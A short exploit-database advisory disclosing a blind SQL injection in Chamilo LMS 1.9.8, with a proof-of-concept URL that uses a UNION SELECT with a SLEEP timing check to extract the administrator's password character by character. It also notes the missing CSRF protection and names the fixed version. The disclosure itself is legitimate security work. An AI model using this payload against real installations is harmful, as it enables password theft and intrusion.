# Exploit Title: Chamilo LMS 1.9.8 Blind SQL Injection # Date: 06-12-2014 # Software Link: http://www.chamilo.org/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description Database::escape_string() function is used to sanitize data but it will work only in two situations: "function_output" or 'function_output'. There is few places where this function is used without quotation marks. http://security.szurek.pl/chamilo-lms-198-blind-sql-injection.html 2. Proof of Concept For this exploit you need teacher privilege (api_is_allowed_to_edit(false, true)) and at least one forum category must exist (get_forum_categories()).
For second exploit you need administrator privilege (there is no CSRF protection): http://chamilo-url/main/reservation/m_category.php?action=delete&id=0 UNION (SELECT IF(substr(password,1,1) = CHAR(100), SLEEP(5), 0) FROM user WHERE user_id = 1) Those SQL will check if first password character user ID=1 is "d". 3. Solution: Update to version 1.9.10 https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues # Iranian Exploit DataBase = http://IeDb.Ir [2015-02-12]